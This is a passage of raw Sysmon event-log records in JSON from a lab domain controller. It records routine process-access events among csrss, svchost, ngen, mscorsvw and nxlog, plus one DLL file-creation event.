06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7007,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:47.399\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:47.399","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7008,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:47.399\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:47.399","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7009,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:47.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:47.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7010,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:48.055\r\nProcessGuid: {E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}\r\nProcessId: 1232\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4d0-0\\System.Runtime.Remoting.dll\r\nCreationUtcTime: 2020-08-01 06:59:48.055","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:48.055","ProcessGuid":"{E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4d0-0\\System.Runtime.Remoting.dll","CreationUtcTime":"2020-08-01 06:59:48.055","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7011,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.102\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00100E140A00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.102","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00100E140A00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7012,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.102\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00100E140A00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.102","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00100E140A00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.118\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00100E140A00}\r\nTargetProcessId: 4556\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.118","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00100E140A00}","TargetProcessId":"4556","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.149\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00107B170A00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:48.149","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E4-5F25-0000-00107B170A00}","TargetProcessId":"5100","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:48.149\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E4-5F25-0000-00107B170A00}\r\nTargetProcessId: 5100\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 